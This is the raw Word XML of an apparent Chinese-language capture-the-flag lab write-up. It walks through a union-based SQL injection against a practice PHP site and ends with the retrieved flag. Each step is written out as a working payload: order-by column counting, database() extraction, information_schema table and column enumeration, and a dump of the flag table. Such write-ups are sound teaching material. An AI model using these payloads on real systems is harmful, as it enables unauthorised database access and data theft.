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93A4F" w14:textId="755B4A35" w:rsidR="002E7CA2" w:rsidRDefault="003A6B41" w:rsidP="003A6B4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实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3AC84B" w14:textId="0219B9D4" w:rsidR="003A6B41" w:rsidRDefault="00173189" w:rsidP="003A6B41">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CentOS</w:t>
      </w:r>
      <w:r>
        <w:t>7.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFAA83F" w14:textId="33371592" w:rsidR="00173189" w:rsidRDefault="00173189" w:rsidP="003A6B41">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5.2.17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6343416D" w14:textId="63925467" w:rsidR="00173189" w:rsidRDefault="007D2520" w:rsidP="003A6B41">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.5.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBCED06" w14:textId="177CCC0A" w:rsidR="007D2520" w:rsidRDefault="007D2520" w:rsidP="003A6B41">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D2520">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29AC5A93" wp14:editId="5D9E4893">
            <wp:extent cx="3669708" cy="3675185"/>
            <wp:effectExtent l="0" t="0" r="698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7760" cy="369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1F03" w14:textId="2F5AB137" w:rsidR="007D2520" w:rsidRDefault="007D2520" w:rsidP="007D252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操作过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D57EF" w14:textId="0E272F3C" w:rsidR="007D2520" w:rsidRDefault="007D2520" w:rsidP="007D2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确定列数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104BD895" w14:textId="3F264588" w:rsidR="007D2520" w:rsidRDefault="007D2520" w:rsidP="007D2520">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依次</w:t>
      </w:r>
      <w:r w:rsidR="009B0B15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidRPr="007D2520">
        <w:t>1'order by 1#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007D2520">
        <w:t xml:space="preserve">1'order by </w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="007D2520">
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007D2520">
        <w:t xml:space="preserve">1'order by </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="007D2520">
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007D2520">
        <w:t xml:space="preserve">1'order by </w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="007D2520">
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t>.....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依次增加数字，直到出现错误为止。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569CCCC2" w14:textId="5BAF0A2B" w:rsidR="007D2520" w:rsidRDefault="007D2520" w:rsidP="007D2520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25E97D" wp14:editId="7A7B4064">
            <wp:extent cx="2530059" cy="4648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B2D9" w14:textId="087C7A36" w:rsidR="007D2520" w:rsidRDefault="007D2520" w:rsidP="007D2520">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由错误信息可得列数只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A692BA1" w14:textId="3F7CA175" w:rsidR="007D2520" w:rsidRDefault="009B0B15" w:rsidP="007D25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获取数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4AE38A" w14:textId="1DE32712" w:rsidR="009B0B15" w:rsidRDefault="009B0B15" w:rsidP="009B0B15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidRPr="009B0B15">
        <w:t>1' union select 1,database()#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB33B49" w14:textId="392ECED2" w:rsidR="009B0B15" w:rsidRDefault="009B0B15" w:rsidP="009B0B15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>atabase()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是获取的是当前所操作的数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BB65C0" w14:textId="36CC676D" w:rsidR="009B0B15" w:rsidRDefault="009B0B15" w:rsidP="009B0B15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B0B15">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27DF4558" wp14:editId="1EA83A2C">
            <wp:extent cx="3089031" cy="149580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1319" cy="1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9856" w14:textId="4B79AC63" w:rsidR="009B0B15" w:rsidRDefault="009B0B15" w:rsidP="009B0B15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果显示当前数据库名为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>argetsys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D7201E" w14:textId="10128E28" w:rsidR="009B0B15" w:rsidRDefault="009B0B15" w:rsidP="009B0B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获取该数据库中的表的信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E456B2" w14:textId="34B17DFD" w:rsidR="009B0B15" w:rsidRDefault="009B0B15" w:rsidP="009B0B15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B0B15">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1' union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B0B15">
        <w:t>1,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B0B15">
        <w:t>_concat(table_name) from information_schema.tables where table_schema=database()#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183B27E2" w14:textId="784F7C84" w:rsidR="00A64EE0" w:rsidRDefault="00A64EE0" w:rsidP="009B0B15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74781D6D" wp14:editId="56438B9A">
            <wp:extent cx="4270104" cy="14888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0606" cy="1502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0BAA" w14:textId="3BB08436" w:rsidR="00A64EE0" w:rsidRDefault="00A64EE0" w:rsidP="00A64EE0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由结果可以看出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>targetsys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库中有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64EE0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>admin,flag,root,user,userid</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64EE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>这五个表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCCCC6D" w14:textId="1A31FD8F" w:rsidR="00A64EE0" w:rsidRDefault="00A64EE0" w:rsidP="00A64EE0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>表中的列的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD90C74" w14:textId="77777777" w:rsidR="00A64EE0" w:rsidRPr="00A64EE0" w:rsidRDefault="00A64EE0" w:rsidP="00A64EE0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C68D189" w14:textId="2B54E644" w:rsidR="00A64EE0" w:rsidRDefault="00A64EE0" w:rsidP="00A64EE0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A64EE0">
        <w:t xml:space="preserve">1' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A64EE0">
        <w:t>1,GROUP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A64EE0">
        <w:t>_CONCAT(column_name) FROM information_schema.columns WHERE table_schema=database() and table_name = 'flag'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7312959E" w14:textId="2EF73785" w:rsidR="00A64EE0" w:rsidRDefault="00A64EE0" w:rsidP="00A64EE0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1FB2D0E3" wp14:editId="54FDFD9C">
            <wp:extent cx="2368062" cy="162927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6835" cy="16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A7BB" w14:textId="535B2FCA" w:rsidR="00A64EE0" w:rsidRDefault="00A64EE0" w:rsidP="00A64EE0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由结果看出，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表有两个字段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14:paraId="6C453A89" w14:textId="0E8DD26C" w:rsidR="00A64EE0" w:rsidRDefault="00A64EE0" w:rsidP="00A64EE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取出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表的信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CE3673" w14:textId="5D116740" w:rsidR="00A64EE0" w:rsidRDefault="00A64EE0" w:rsidP="00A64EE0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A64EE0">
        <w:t>1' UNION SELECT * FROM flag#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB2FB55" w14:textId="1288486C" w:rsidR="00A64EE0" w:rsidRDefault="00A64EE0" w:rsidP="00A64EE0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D87B270" wp14:editId="2E7E9C44">
            <wp:extent cx="3304468" cy="14360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455" cy="14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14F1F05" w14:textId="5F22481E" w:rsidR="007445EB" w:rsidRPr="007445EB" w:rsidRDefault="007445EB" w:rsidP="007445EB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>填入</w:t>
      </w:r>
      <w:r w:rsidRPr="007445EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag{e10adc3949ba59abbe56e057f20f883e}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5D067F" w14:textId="72B58E09" w:rsidR="00A64EE0" w:rsidRDefault="00A64EE0" w:rsidP="00A64EE0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提交成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4067B4FE" w14:textId="4CBF7299" w:rsidR="00A64EE0" w:rsidRDefault="00A64EE0" w:rsidP="00A64EE0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A64EE0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="679C456D" wp14:editId="3C99C8B5">
            <wp:extent cx="2743200" cy="1133554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6235" cy="114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6148"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="61A805D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38E285D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="380EF8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75F4"/>
    <w:rsid w:val="00173189"/>
    <w:rsid w:val="002E7CA2"/>
    <w:rsid w:val="003A6B41"/>
    <w:rsid w:val="005E75F4"/>
    <w:rsid w:val="007445EB"/>
    <w:rsid w:val="007D2520"/>
    <w:rsid w:val="009B0B15"/>
    <w:rsid w:val="00A6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769F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9E07152D-85FC-4F4E-9D0B-06F2BB962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4E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B4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A64EE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柏任</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>陈 柏任</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-04T12:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-04T13:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>